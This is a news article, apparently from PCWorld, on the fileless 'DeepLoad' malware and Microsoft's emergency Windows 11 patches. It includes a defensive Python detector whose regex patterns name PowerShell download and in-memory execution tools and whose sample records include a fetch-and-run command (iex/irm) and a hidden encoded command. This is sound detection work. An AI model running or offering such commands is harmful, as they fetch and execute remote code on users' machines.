Windows 11’s security situation continues to deteriorate. Users and businesses, especially the latter, are facing two risky developments: first, a new AI-powered malware threat, and second, additional emergency updates from Microsoft fixing critical security vulnerabilities.
This combination highlights just how rapidly the threat landscape in the Windows environment is changing these days.
At the center is a new piece of malware called “DeepLoad,” which differs from conventional malware: instead of delivering suspicious files to the computer, it relies on a so-called “fileless” attack method.
Specifically, users are tricked into entering seemingly harmless commands into Command Prompt or PowerShell. It’s through this action that the infection is actually triggered—and traditional antivirus scanners, which primarily react to known files, often fail to detect it.
Once the system has been compromised, the malware can establish a permanent foothold and communicate with the attackers’ servers via legitimate Windows tools. The primary goal is to steal login credentials, particularly in corporate environments.
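Because the infection described above starts with a command the user runs rather than a file written to disk, detection has to examine process command lines instead of file signatures. The sketch below is an added example, not from the article and not based on any published DeepLoad indicators: it scores constructed process-creation records, and the field names, patterns, threshold and agent path are assumptions for illustration.

```python
import re

INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
AGENT = r"C:\Program Files\Agent\agent.exe"  # hypothetical management agent

# Assumed heuristics for illustration; tune them against your own baseline.
INDICATORS = {
    "encoded_command": re.compile(r"\s-(e|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I),
    "hidden_window": re.compile(r"\s-(w|windowstyle)\s+(h|hidden)\b", re.I),
    "network_fetch": re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b", re.I),
    "in_memory_exec": re.compile(r"\b(iex|invoke-expression)\b", re.I),
}

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def score_event(event):
    """Return the sorted indicator names matched by one process-creation record."""
    if basename(event["image"]) not in INTERPRETERS:
        return []
    hits = [name for name, rx in INDICATORS.items() if rx.search(event["command_line"])]
    # A shell whose parent is explorer.exe was started by the logged-on user,
    # which fits a command the user was talked into running.
    if hits and basename(event["parent"]) == "explorer.exe":
        hits.append("user_launched")
    return sorted(hits)

def triage(events, threshold=2):
    """Return (command_line, hits) for records with at least `threshold` indicators."""
    flagged = []
    for event in events:
        hits = score_event(event)
        if len(hits) >= threshold:
            flagged.append((event["command_line"], hits))
    return flagged

# Constructed sample records (not real telemetry); example.invalid is a placeholder host.
SAMPLE_EVENTS = [
    {"image": PS, "parent": EXPLORER, "command_line": "powershell.exe -NoProfile -w hidden -enc QQBCAEMARABFAEYARwBIAEkASgA="},
    {"image": PS, "parent": EXPLORER, "command_line": 'powershell.exe -c "iex (irm https://example.invalid/setup)"'},
    {"image": PS, "parent": AGENT, "command_line": r"powershell.exe -File C:\Scripts\inventory.ps1"},
    {"image": PS, "parent": AGENT, "command_line": "powershell.exe -Command Invoke-WebRequest https://example.invalid/tool.zip -OutFile tool.zip"},
]

if __name__ == "__main__":
    for cmd, hits in triage(SAMPLE_EVENTS):
        print(hits, cmd)
```

Only the two user-launched records cross the threshold; the scheduled inventory script and the single plain download stay below it, which keeps routine administration out of the alert queue.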
For you as a user, this means one thing above all: traditional protection mechanisms are increasingly reaching their limits. AI-powered malware can dynamically adapt its code, making it significantly harder to detect.
At the same time, the time between a security vulnerability being discovered and the first attacks is shrinking.
For home users, the risk is currently lower than in corporate environments. Nevertheless, even everyday attacks are increasingly relying on deception rather than technology.
Even though many current attacks specifically target businesses, there are some basic measures you can start taking right now:
In parallel, Microsoft already released emergency security updates in mid-March. These primarily affect Windows 11 Enterprise versions such as 24H2 and 25H2, as well as the LTSC variant.
Several critical vulnerabilities in Routing and Remote Access Service (RRAS) have been patched. Attackers could exploit these flaws to execute malicious code remotely and take complete control of a system. In some scenarios, simply connecting to a compromised server was enough for an attack to succeed.
The current issues are part of a wider trend. On Patch Tuesday in March, Microsoft patched more than 80 vulnerabilities, including critical flaws in Excel and other Office applications. In some cases, simply opening the preview pane in Outlook was enough to execute malicious code.
Furthermore, initial examples show that AI features such as Copilot can also create new attack vectors—for instance, when data is inadvertently passed on via automated processes.
Author: Viviane Osswald
Source: PCWorld
Reviewed By: Editorial Team